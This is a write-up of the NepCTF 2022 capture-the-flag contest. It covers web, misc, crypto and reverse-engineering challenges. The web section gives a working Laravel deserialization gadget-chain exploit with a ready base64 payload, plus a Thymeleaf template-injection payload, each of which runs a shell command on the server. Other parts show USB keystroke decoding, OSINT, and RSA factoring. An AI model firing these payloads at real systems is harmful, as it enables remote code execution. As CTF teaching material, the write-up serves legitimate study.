[CTF]-NepCTF2022

Published: 2023/12/16

  • web
    • Just Kidding
    • Challenger
  • Misc
    • 簽到 (Sign-in)
    • 花花畫畫畫花花
    • 餡餅?陷阱!
    • 9點直播
    • 少見的base
    • 原來你也玩智能家居
    • DoubleHappiness
  • Crypto
    • sinin
    • 中學數學
  • Re
    • 簽到 (Sign-in)

web

Just Kidding

Directory scanning turns up www.zip.

Download it and audit the source.

```php
// App\Http\Controllers\HelloController.php
class HelloController extends Controller
{
    public function hello(\Illuminate\Http\Request $request)
    {
        $h3 = base64_decode($request->input("h3"));
        unserialize($h3);  // request-controlled data goes straight into unserialize()
        return "Welcome Nepctf! GL&HF";
    }
}
```

This PHP file calls unserialize() on request input, so it has a deserialization vulnerability.

Look for __destruct() methods. Following the __destruct method in src/Illuminate/Broadcasting/PendingBroadcast.php, both $this->events and $this->event are controllable, so the next step is to find a usable dispatch method.

```php
...
public function __destruct()
{
    $this->events->dispatch($this->event);
}
```

Following the dispatch method in src/Illuminate/Bus/Dispatcher.php, $command and $this->queueResolver are both controllable.

Following on into dispatchToQueue, $command and $this->queueResolver are again both controllable,

so the call_user_func call in that method can be used to reach command execution.

What remains is the command string itself. Note this line in dispatchToQueue (from the screenshot): $connection = $command->connection ?? null;

$connection can be controlled through a property of the class in src/Illuminate/Broadcasting/BroadcastEvent.php,

which gives command execution.

```php
<?php
// exp
namespace Illuminate\Contracts\Queue {
    interface ShouldQueue {}
}

namespace Illuminate\Bus {
    class Dispatcher
    {
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;

        function __construct()
        {
            $this->queueResolver = "system";
        }
    }
}

namespace Illuminate\Broadcasting {
    use Illuminate\Contracts\Queue\ShouldQueue;

    class BroadcastEvent implements ShouldQueue
    {
        function __construct() {}
    }

    class PendingBroadcast
    {
        protected $events;
        protected $event;

        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "cat /flag";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}

namespace {
    $pop = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($pop));
}
```

payload

```
/hello?h3=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319
```
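Added, defender-side example (not part of the original writeup): a request-parameter check for the pattern exploited here, a base64-encoded PHP serialize() object graph arriving in a query parameter like h3. It decodes the value, extracts the declared class names by their declared lengths and flags a known gadget root; the GADGET_CLASSES list and the sample parameters are constructed for illustration.

```python
"""Flag base64-encoded PHP serialize() object graphs in a request parameter such as h3 above."""
import base64
import binascii
import re

# Classes that open the gadget chain discussed above; assumption: a local list a WAF/IDS rule would maintain.
GADGET_CLASSES = {
    "Illuminate\\Broadcasting\\PendingBroadcast",
    "Illuminate\\Bus\\Dispatcher",
    "Illuminate\\Broadcasting\\BroadcastEvent",
}
_OBJ_HEADER = re.compile(rb'[OC]:(\d+):"')   # O:<len>:"<class>":<n>:{ ... } or C:<len>:"<class>":...

def php_classes(data: bytes) -> list:
    """Class names declared in a serialize() blob, taken by their declared length so that
    a quote inside a name or a truncated blob cannot mislead the extraction."""
    names = []
    for m in _OBJ_HEADER.finditer(data):
        start, length = m.end(), int(m.group(1))
        name = data[start:start + length]
        if len(name) == length and data[start + length:start + length + 2] == b'":':
            names.append(name.decode("latin-1"))
    return names

def decode_param(value: str) -> bytes:
    """Standard or URL-safe base64 with missing padding tolerated; b'' when not base64 at all."""
    cleaned = value.strip().replace("-", "+").replace("_", "/")
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return b""

def scan_param(value: str) -> dict:
    """Verdict for one parameter value: any object graph in a request parameter is suspicious,
    a known gadget root is a strong indicator that unserialize() is being targeted."""
    raw = decode_param(value)
    classes = php_classes(raw) if raw.startswith((b"O:", b"C:", b"a:")) else []
    return {"classes": classes,
            "suspicious": bool(classes),
            "known_gadget": any(c in GADGET_CLASSES for c in classes)}

# Constructed sample: the same object shape as the chain above, without any command string.
SAMPLE_SERIALIZED = (b'O:40:"Illuminate\\Broadcasting\\PendingBroadcast":1:{s:9:"\x00*\x00events";'
                     b'O:25:"Illuminate\\Bus\\Dispatcher":0:{}}')
SAMPLE_PARAM = base64.b64encode(SAMPLE_SERIALIZED).decode()
BENIGN_PARAM = base64.b64encode(b'{"lang":"en"}').decode()

if __name__ == "__main__":
    for param in (SAMPLE_PARAM, BENIGN_PARAM):
        print(scan_param(param))
```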

Challenger

Code audit

```java
// key code
@GetMapping({"/eval"})
public String path(@RequestParam String lang) {
    return "user/" + lang + "/welcome";
}
```

Exploit Thymeleaf template injection (the lang parameter is concatenated directly into the view name).

Visit /eval.

It requires the lang parameter:

```
/eval?lang=.....
```

Then find the payload:

```
?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7d__::.x
```


Misc

簽到 (Sign-in)

Nested archives, about 230 layers deep.

```
┌──(root㉿kali)-[/home/muz1/桌面]
└─# binwalk xxx.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
33877         0x8455          Zip archive data, at least v1.0 to extract, compressed size: 77532, uncompressed size: 77532, name: 232.zip
111452        0x1B35C         End of Zip archive, footer length: 22
111709        0x1B45D         End of Zip archive, footer length: 22

┌──(root㉿kali)-[/home/muz1/桌面]
└─# foremost xxx.jpg
Processing: xxx.jpg |foundat=232.zipUT
foundat=繼續解壓呀 UT
*|
```

Zip pseudo-encryption: reset the encryption flag field.

Extracting the last layer gives a packet capture.

Extract the keyboard data with tshark:

```
tshark.exe -r .\keyboard.pcap -T fields -e usb.capdata > usbdata.txt
```

usbdata.txt:

```
0000110000000000
0000000000000000
0000080000000000
0000000000000000
0000130000000000
0000000000000000
0000060000000000
0000000000000000
0000170000000000
0000000000000000
0000090000000000
0000000000000000
0200000000000000
02002f0000000000
0200000000000000
0000000000000000
00001a0000000000
00001a0800000000
0000080000000000
0000000000000000
00000f0000000000
0000000000000000
0000060000000000
0000000000000000
0000120000000000
0000121000000000
0000100000000000
0000000000000000
0000080000000000
0000000000000000
2000000000000000
20002d0000000000
0000000000000000
0000170000000000
0000120000000000
0000000000000000
2000000000000000
20002d0000000000
0000000000000000
0000110000000000
0000000000000000
0000080000000000
0000000000000000
0000130000000000
0000000000000000
0000060000000000
0000000000000000
0000170000000000
0000000000000000
0000090000000000
0000000000000000
2000000000000000
20002d0000000000
0000000000000000
00001f0000000000
0000000000000000
0000110000000000
0000000000000000
0000070000000000
0000000000000000
0200000000000000
0200300000000000
0200000000000000
0000000000000000
0000280000000000
0000000000000000
```

Convert the format (insert colons between the bytes):

```python
f = open('data.txt', 'r', encoding='utf-16')
fi = open('out.txt', 'w', encoding='utf-16')
while 1:
    a = f.readline().strip()
    if a:
        if len(a) == 16:  # for mouse traffic change the length to 8
            out = ''
            for i in range(0, len(a), 2):
                if i + 2 != len(a):
                    out += a[i] + a[i + 1] + ":"
                else:
                    out += a[i] + a[i + 1]
            fi.write(out)
            fi.write('\n')
    else:
        break
fi.close()
```

Then extract the keystrokes:

```python
normalKeys = {
    "04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h",
    "0c": "i", "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p",
    "14": "q", "15": "r", "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x",
    "1c": "y", "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6",
    "24": "7", "25": "8", "26": "9", "27": "0", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>",
    "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\",
    "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
    "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>",
    "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>",
    "45": "<F12>"}
shiftKeys = {
    "04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H",
    "0c": "I", "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P",
    "14": "Q", "15": "R", "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X",
    "1c": "Y", "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^",
    "24": "&", "25": "*", "26": "(", "27": ")", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>",
    "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|",
    "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
    "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>",
    "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>",
    "45": "<F12>"}
output = []
keys = open('out.txt', 'r', encoding='utf-16')
for line in keys:
    try:
        # keep only reports whose modifier byte is 00 or 02 (left shift) and whose other
        # keycode slots are zero; this also drops right-shift (20) reports, which is why
        # the '_' characters are missing from the output below
        if line[0] != '0' or (line[1] != '0' and line[1] != '2') or line[3] != '0' or line[4] != '0' \
                or line[9] != '0' or line[10] != '0' or line[12] != '0' or line[13] != '0' \
                or line[15] != '0' or line[16] != '0' or line[18] != '0' or line[19] != '0' \
                or line[21] != '0' or line[22] != '0' or line[6:8] == "00":
            continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]], [shiftKeys[line[6:8]]]][line[1] == '2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()
flag = 0
print("".join(output))
# apply backspaces
for i in range(len(output)):
    try:
        a = output.index('<DEL>')
        del output[a]
        del output[a - 1]
    except:
        pass
# apply Caps Lock between pairs of <CAP> markers
for i in range(len(output)):
    try:
        if output[i] == "<CAP>":
            flag += 1
            output.pop(i)
            if flag == 2:
                flag = 0
        if flag != 0:
            output[i] = output[i].upper()
    except:
        pass
print('output :' + "".join(output))
```

Script output, then the flag:

```
output :nepctf{welcometonepctf2nd}<RET>
```

nepctf{welcome_to_nepctf_2nd}
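Added example (not from the original writeup): a decoder that works directly on the tshark usb.capdata lines and handles two things the scripts above skip, the right-shift modifier (0x20) and reports carrying two keycodes at once, which is why the underscores had to be restored by hand. SAMPLE is an excerpt of the page's own capture (the first 19 reports); the keymap follows the standard HID keyboard usage table.

```python
"""Decode USB HID boot-keyboard reports (the tshark usb.capdata lines above) into typed text."""

# Usage-ID -> character tables for the HID keyboard page (0x32 is the non-US '#' key).
PLAIN = {0x04 + i: c for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
PLAIN.update({0x1E + i: c for i, c in enumerate("1234567890")})
PLAIN.update({0x2D + i: c for i, c in enumerate("-=[]\\#;'`,./")})
PLAIN.update({0x28: "\n", 0x2B: "\t", 0x2C: " "})
SHIFTED = {k: v.upper() for k, v in PLAIN.items()}
SHIFTED.update({0x1E + i: c for i, c in enumerate("!@#$%^&*()")})
SHIFTED.update({0x2D + i: c for i, c in enumerate("_+{}|~:\"~<>?")})
BACKSPACE, CAPS_LOCK = 0x2A, 0x39

def decode_reports(hex_lines):
    """Emit a character only on a key-down edge, so a key held across reports is not
    duplicated; reads all six keycode slots and both shift bits of the modifier byte."""
    out, prev_keys, caps = [], set(), False
    for line in hex_lines:
        line = line.strip()
        if len(line) != 16:                     # 8-byte keyboard reports only (blank/mouse lines skipped)
            continue
        report = bytes.fromhex(line)
        shift = bool(report[0] & 0x22)          # modifier byte: 0x02 left shift, 0x20 right shift
        keys = [k for k in report[2:8] if k]    # up to six concurrently pressed keys
        for key in keys:
            if key in prev_keys:                # still held since the last report: no new keystroke
                continue
            if key == CAPS_LOCK:
                caps = not caps
            elif key == BACKSPACE:
                if out:
                    out.pop()
            elif key in PLAIN:
                ch = (SHIFTED if shift else PLAIN)[key]
                if caps and ch.isalpha():
                    ch = ch.swapcase()
                out.append(ch)
            else:
                out.append("<%02x>" % key)      # function keys etc. kept as markers
        prev_keys = set(keys)
    return "".join(out)

# Excerpt of the page's capture (first 19 reports): n e p c t f, shift+[ , w, then w+e in one report.
SAMPLE = """
0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000
0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000
0000090000000000 0000000000000000 0200000000000000 02002f0000000000 0200000000000000
0000000000000000 00001a0000000000 00001a0800000000 0000080000000000
""".split()

if __name__ == "__main__":
    print(repr(decode_reports(SAMPLE)))   # 'nepctf{we'
```

Fed the full usbdata.txt above, it returns the flag with the underscores and the trailing Enter in place.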

花花畫畫畫花花

The .osu file suggests the rhythm game osu!.

After installing it, drop the folder into the Songs directory and the map can be played or edited.

NepCTF{MASTER_OF_壞女人!}

餡餅?陷阱!

瓊 (Qiong) is the abbreviation for Hainan.

Google Maps, locate Hainan.

Search for Home Inn (如家酒店).

China Everbright Bank: NepCTF{www.cebbank.com}

9點直播

Freebie from the livestream room.


少見的base

Nothing visible in 010 Editor.

Nothing from binwalk either:

```
┌──(root㉿kali)-[~/桌面]
└─# binwalk bbbbase.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
```

Tried tools until Jphswin (JPHS for Windows) gave a hit.

Select file --> Seek --> no password --> save file

Open the result in 010 Editor --> decode

flag{Real_qiandao~}

原來你也玩智能家居

Log in with admin / admin.

There is a toggle button on the home page.

Here MQTT's wildcard subscriptions can be used to capture all messages under cmnd, i.e. subscribe to cmnd/#.

Click the toggle button.


DoubleHappiness

Open the image with Honeyview.

Click GPS.

Search for shops nearby.
The nearby Luckin Coffee is the Lianhua Business Center branch (瑞幸咖啡(蓮花商務中心店)).

Find this shop in the Meituan food-delivery app and look at the reviews dated July 13.

Search Weibo for Tr0jAn-.

Sure enough, it is him. The latest Weibo post is a night view of West Lake taken from Baoshi Hill; the watermark in the lower-right corner is pixelated, and the letters NepCTF are faintly visible.

Crop out the pixelated region first,

then recover it with the unRedacter tool. Note that the cropped region has to be rescaled to 304x40, and uppercase letters, digits and the underscore have to be added to the dictionary.

NepCTF{ti_0d_nAj0r}

Crypto

sinin

Factor N with yafu:

```
P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901
P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891
```

This gives p and q; combine them with c_mod_q and c_mod_p (Chinese Remainder Theorem) to recover c.

```python
# gcd of two numbers
def gcd(a, b):
    if b == 0:
        return a
    else:
        return gcd(b, a % b)

# check that the numbers in a list are pairwise coprime
def compare(list):
    for i in range(0, len(list)):
        flag = 1
        for j in range(i + 1, len(list)):
            if gcd(list[i], list[j]) != 1:
                print('The Chinese Remainder Theorem cannot be applied directly!')
                exit()
# if the condition holds execution continues, otherwise the program exits

# product m of the inputs m1, m2, ..., mk
def product_m(list):
    m = 1
    for i in list:
        m *= i
    return m

# M1, M2, ..., Mk with Mj = m / mj, returned as a list
def get_divsion(list, m):
    div = []
    for i in list:
        div.append(m // i)
    return div

def get_inverse(a, m):  # inverse of a modulo m; returns a single value, not a list
    if gcd(a, m) != 1:
        return None
    u1, u2, u3 = 1, 0, a
    v1, v2, v3 = 0, 1, m
    while v3 != 0:
        q = u3 // v3
        v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3
    return u1 % m

# Xj = (Mj * Mj_inverse * aj) % m
def get_x(M: int, M_inverse: int, a: int, m: int):
    product_x = (M * M_inverse * a) % m
    return product_x

# final answer X = X1 + X2 + ... + Xk
def get_solution(list_m, list_a):
    # compare(list_m)
    m = product_m(list_m)
    list_M = get_divsion(list_m, m)
    list_M_inverse = []
    list_X = []
    total = 0
    for i in range(0, len(list_M)):
        list_M_inverse.append(get_inverse(list_M[i], list_m[i]))
    for i in range(len(list_M)):
        list_X.append(get_x(list_M[i], list_M_inverse[i], list_a[i], m))
    for x in list_X:
        total += x
    return total % m

# test data
list_m = [141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901,
          141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891]
list_a = [32087476819370469840242617415402189007173583393431940289526096277088796498999849060235750455260897143027010566292541554247738211165214410052782944239055659645055068913404216441100218886028415095562520911677409842046139862877354601487378542714918065194110094824176055917454013488494374453496445104680546085816,
          59525076096565721328350936302014853798695106815890830036017737946936659488345231377005951566231961079087016626410792549096788255680730275579842963019533111895111371299157077454009624496993522735647049730706272867590368692485377454608513865895352910757518148630781337674813729235453169946609851250274688614922]
print(get_solution(list_m, list_a))
# call get_solution() to apply the Chinese Remainder Theorem
# get_solution() takes two lists, list_a and list_m
# read list_a and list_m from input and convert them to integers
```

Substituting gives c; then continue with the following code.

```python
from Crypto.Util.number import long_to_bytes

def fast_power(base, power, MOD):
    result = 1
    while power > 0:
        # If power is odd
        if power % 2 == 1:
            result = (result * base) % MOD
        # Divide the power by 2
        power = power // 2
        # Multiply base to itself
        base = (base * base) % MOD
    return result

def gcd(a, b):
    while a != 0:
        a, b = b % a, a
    return b

# calc : b^(-1) mod m
def findModeInverse(b, m, show=True):
    if gcd(m, b) != 1:
        return None
    A1, A2, A3 = 1, 0, m
    B1, B2, B3 = 0, 1, b
    if show:
        print('-' * 54)
        print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("Q", "A1", "A2", "A3", "B1", "B2", "B3"))
        print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("-", A1, A2, A3, B1, B2, B3))
    while True:
        Q = A3 // B3
        B1, B2, B3, A1, A2, A3 = (A1 - Q * B1), (A2 - Q * B2), (A3 - Q * B3), B1, B2, B3
        if show:
            print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format(Q, A1, A2, A3, B1, B2, B3))
        if B3 == 0:
            return None
        elif B3 == 1:
            break
    if show:
        print("-" * 54)
    return B2 % m

p = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901
q = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891
d = 1252990107815050396131095071106875863839625463162341861437776714252424196867083751438050781152678454544290561348477588314424473974689219719915628330383292496262245806653795391680166551537602119522395725446199697857165189662727850129646294082998077471030893379415607095699225984851603694723276083262879311002929800558428024700747018831268269585502183294987547669372754175415834581968714034535861714455512875208618004858007748676310828573704007774858023825900743373244384093983022857223181677619286464710238287796148593564498619278346936626883260434122906742989245858429095035901635408963549294384055658232382801968473
c = 11585753035364453623378164545833713948934121662572481093551492504984285077422719062455876099192809170965528989978916297975142142402092047776685650391890015591851053625214326683661927557815767412532952834312578481775648269348260126890551800182341487341482624921905494384205411870866282984671167687789838745481283560185866063970417999748309023918055613674098243729965218609202078551918246640314724590879724609275497227193516782920583249761139685192331805838597293957173545581106446048233248746840771791319643962479707861560044363232580020690857525268858245122996322707454824806268698526881569554077998480289824923073346

dp = d % (p - 1)
dq = d % (q - 1)
Cp = c % p
Cq = c % q
a = findModeInverse(q, p, False)  # inverse of q modulo p
Mp = fast_power(Cp, dp, p)        # m mod p
Mq = fast_power(Cq, dq, q)        # m mod q
b = (a * ((Mp - Mq) % p)) % p     # Garner's recombination
c = Mq + b * q
print("CRT decryption result:", c)
print(long_to_bytes(c))
```

NepCTF{ju5t_d0_f4ct_4nd_crt_th3n_d3crypt}

中學數學

```python
from gmpy2 import *
# from Crypto.Util.number import *
from Crypto import *
from secret import *

p = getPrime(1024)
q = next_prime(p + (p >> 500))
e = 0x10001
n = p * q
c = pow(bytes_to_long(flag), e, n)
print("n=", n)
print("c=", c)
'''
n= 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507
c= 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186
'''
```

From the code, p and q are very close, but the first script I tried did not produce a result.
Fermat's factorization method also targets close p and q,
so find a Fermat factorization script.

```python
from Crypto.Util.number import long_to_bytes
import gmpy2

c = 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186
n = 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507
e = 0x10001

def factor(n):
    a = gmpy2.iroot(n, 2)[0]
    while 1:
        B2 = pow(a, 2) - n
        if gmpy2.is_square(B2):
            b = gmpy2.iroot(B2, 2)[0]
            p = a + b
            q = a - b
            return p, q
        a += 1  # don't forget: a is incremented in steps of 1

p, q = factor(n)
f = (p - 1) * (q - 1)
d = gmpy2.invert(e, f)
print(long_to_bytes(pow(c, d, n)))
# b'flag{never_ignore_basic_math}'
```
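Added example (not from the original writeup): the same Fermat method turned into a key-hygiene check, with the iteration budget made explicit so it can be run against a modulus before it is trusted. demo_keys() builds a constructed pair of keys with the same shape as the challenge, q = next_prime(p + (p >> k)), at 64-bit size and k = 24 so the check finishes in a few thousand steps; the Miller-Rabin bases are exact for numbers this small.

```python
"""Weak-RSA-key check: can Fermat's method split n because p and q are too close?"""
import math
import random

_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)  # Miller-Rabin is exact with these for n < 3.3e24

def is_probable_prime(n: int) -> bool:
    if n < 2:
        return False
    for b in _BASES:
        if n % b == 0:
            return n == b
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for b in _BASES:
        x = pow(b, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def next_prime(n: int) -> int:
    n += 1
    while not is_probable_prime(n):
        n += 1
    return n

def fermat_factor(n: int, max_iter: int = 100_000):
    """Return (p, q) with p * q == n if found within max_iter steps, else None (n odd).
    Writing n = a^2 - b^2 needs about (p - q)^2 / (8 * sqrt(n)) increments of a, so a
    small budget already exposes keys built like q = next_prime(p + (p >> k))."""
    a = math.isqrt(n)
    if a * a < n:
        a += 1                      # start at ceil(sqrt(n)) so a^2 - n >= 0
    for _ in range(max_iter):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:             # a^2 - n is a perfect square: n = (a + b)(a - b)
            return a + b, a - b
        a += 1
    return None

def demo_keys(bits: int = 64, shift: int = 24, seed: int = 1):
    """Constructed keys: one built like the challenge (q just above p), one from independent primes."""
    rng = random.Random(seed)
    p = next_prime(rng.getrandbits(bits) | (1 << (bits - 1)))
    q_close = next_prime(p + (p >> shift))          # same shape as the challenge, smaller parameters
    q_far = next_prime(rng.getrandbits(bits) | (1 << (bits - 1)))
    return p * q_close, p * q_far
```

For the challenge's 1024-bit primes with k = 500 the same estimate gives roughly 2^21 steps, which is why the page's loop still terminates.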

Re

簽到 (Sign-in)

Open the binary in IDA and fix the load error (edit the cfg file and adjust the graph view settings).

The flag is in the lower-left corner.

